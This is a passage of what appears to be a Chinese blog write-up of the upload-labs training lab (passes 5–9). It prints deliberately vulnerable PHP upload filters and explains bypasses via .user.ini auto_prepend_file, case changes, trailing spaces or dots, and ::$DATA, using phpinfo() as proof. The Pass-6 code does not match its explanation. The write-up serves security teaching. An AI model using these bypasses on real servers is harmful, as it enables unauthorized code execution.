<h2 id="Pass-05-user-ini"><a href="#Pass-05-user-ini" class="headerlink" title="Pass-05-.user.ini"></a>Pass-05-.user.ini</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>代码中黑名单做的很严格,基本上对 Pass04 进行啦升级,并拒绝上传 .htaccess 文件。<br>反复观察发现没有被限制的文件名有 .php7 以及 .ini。</p>
<blockquote>
<p><strong>.user.ini</strong> :<br>自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。</p>
<p>除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。</p>
<p>在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。</p>
<p>两个新的 INI 指令,user_ini.filename 和 user_ini.cache_ttl 控制着用户 INI 文件的使用。</p>
<p>user_ini.filename 设定了 PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。默认值是 .user.ini。</p>
<p>user_ini.cache_ttl 控制着重新读取用户 INI 文件的间隔时间。默认是 300 秒(5 分钟)。</p>
</blockquote>
<p>众所周知 php.ini 是 php的配置文件,.user.ini 中的字段也会被 php 视为配置文件来处理,从而导致 php 的文件解析漏洞。<br>Pass05 是最新加入的环境,个人感觉像是弥补 Pass04 只能在 Apache 上浮现,因为 .user.ini 的Pass05在 nginx 上很容易复现~</p>
<p>但是想要引发 .user.ini 解析漏洞需要三个前提条件</p>
<ul>
<li>服务器脚本语言为PHP</li>
<li>服务器使用CGI/FastCGI模式</li>
<li>上传目录下要有可执行的php文件</li>
</ul>
<blockquote>
<p><strong>什么是 CGI</strong><br>CGI 的全称为“通用网关接口”(Common Gateway Interface),为 HTTP 服务器与其他机器上的程序服务通信交流的一种工具, CGI 程序须运行在网络服务器上。</p>
<p>传统 CGI 接口方式的主要缺点是性能较差,因为每次 HTTP 服务器遇到动态程序时都需要重新启动解析器来执行解析,之后结果才会被返回给 HTTP<br>服务器。这在处理高并发访问时几乎是不可用的,因此就诞生了 FastCGI。另外,传统的 CGI 接口方式安全性也很差,故而现在已经很少被使用了。</p>
<p><strong>什么是 FastCGI</strong><br>FastCGI 是一个可伸缩地、高速地在 HTTP 服务器和动态服务脚本语言间通信的接口(在 Linux 下, FastCGI 接口即为 socket,这个socket 可以是文件 socket,也可以是IP socket),主要优点是把动态语言和 HTTP 服务器分离开来。多数流行的 HTTP 服务器都支持 FastCGI,包括 Apache 、 Nginx 和 Lighttpd 等。</p>
<p>同时,FastCGI也被许多脚本语言所支持,例如当前比较流行的脚本语言PHP。FastCGI 接口采用的是C/S架构,它可以将 HTTP 服务器和脚本服务器分开,同时还能在脚本解析服务器上启动一个或多个脚本来解析守护进程。当 HTTP 服务器遇到动态程序时,可以将其直接交付给 FastCGI 进程来执行,然后将得到结果返回给浏览器。这种方式可以让 HTTP 服务器专一地处理静态请求,或者将动态脚本服务器的结果返回给客户端,这在很大程度上提高整个应用系统的性能。</p>
</blockquote>
<p>nginx的配置文件:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="section">location</span> <span class="regexp">~ \.php</span>{</span><br><span class="line"> <span class="attribute">root</span> /var/upload;</span><br><span class="line"> <span class="attribute">fastcgi_pass</span> <span class="number">127.0.0.1:9000</span>;</span><br><span class="line"> <span class="attribute">fastcgi_index</span> index.php;</span><br><span class="line"> <span class="attribute">fastcgi_param</span> SCRIPT_FILENAME <span class="variable">$document_root</span><span class="variable">$fastcgi_script_name</span>;</span><br><span class="line"> <span class="attribute">include</span> fastcgi_params;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>而对于第三点 Pass05 的提示让去看 readme.php:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="keyword">echo</span> <span class="string">"该目录是上传文件保存,该文件为系统说明文件,请勿删除!"</span>;<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>从而确认 upload 目录存在 php 的可执行文件,环境全部满足一引发 .user.ini 文件解析漏洞</p>
<p><strong>第一种:在我的环境里可以直接使用 php7 上传~</strong><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606151-689078-upload-labs5-3.png" alt="img"><br><strong>第二种:.user.ini 文件~</strong><br>我们先来创建一个 .user.ini 文件并写入一下内容:</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=pass5.png</span><br></pre></td></tr></table></figure>
<p>上传 .user.ini:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606357-491352-upload-labs5-4.png" alt="img"></p>
<p>新建pass5.php写入一下内容:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>将 pass5.php 重命名为 pass5.png 后上传:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606500-656200-upload-labs5-5.png" alt="img"></p>
<p>等待5分钟后访问:readme.php<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582606555-543651-upload-labs5-6.png" alt="img"></p>
<p>此时 .user.ini 指定的所有符合 php 语言格式的文件均会被 readme.php 执行</p>
<h2 id="Pass-6-大小写绕过"><a href="#Pass-6-大小写绕过" class="headerlink" title="Pass-6-大小写绕过"></a>Pass-6-大小写绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>相比于pass-4,过滤了.htaccess,但将后缀转换为小写去掉了,因此可以使用大小绕过</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726003427022.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726003434104.png" alt="在这里插入图片描述"></p>
<h2 id="Pass-7-空格绕过"><a href="#Pass-7-空格绕过" class="headerlink" title="Pass-7-空格绕过"></a>Pass-7-空格绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>文件名限制的已经很全了,格式都限制死里就看看源码吧~<br>发现源码中没有对空格限制的以下字段:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>
<p>直接构造结尾带空格的数据包上传:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582610313-719923-upload-labs7-2.png" alt="img"><br>即可发送成功</p>
<p>但是上传的 php 文件然仍无法执行,因为环境是 linux 的<br>如果是 windows 的系统,windows 在保存的时候会把最后的空格取出掉,让和会将完整的 php 文件保存到服务器</p>
<h2 id="Pass-8-点绕过"><a href="#Pass-8-点绕过" class="headerlink" title="Pass-8-点绕过"></a>Pass-8-点绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>如提示所示”所有可以解析的文件都限制死了”<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582610912-587025-upload-labs8-1.png" alt="img"></p>
<p>既然文件名写死里我们就考虑加点东西或者减点东西<br>经过测试<code>::$DATA</code> <code>. .</code> <code>.</code>等字符后,发现文件名结尾加<code>.</code>可以绕过</p>
<p>在文件结尾加<code>.</code><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582611226-165297-upload-labs9-1.png" alt="img"></p>
<p>跟 Pass07 的情况一样,成功上传里 php. 但是因为是 linux 环境所以无法执行该文件,Pass08 利用的也是 windows 中的文件名特性,如果在 windows 环境中上传一个 php. 文件,windows 不允许文件结果带<code>.</code>,所以 windows 会自动把<code>.</code> 删除掉,从而形成可以执行的 php 文件</p>
<h2 id="Pass-9-DATA绕过"><a href="#Pass-9-DATA绕过" class="headerlink" title="Pass-9-::$DATA绕过"></a>Pass-9-::$DATA绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span 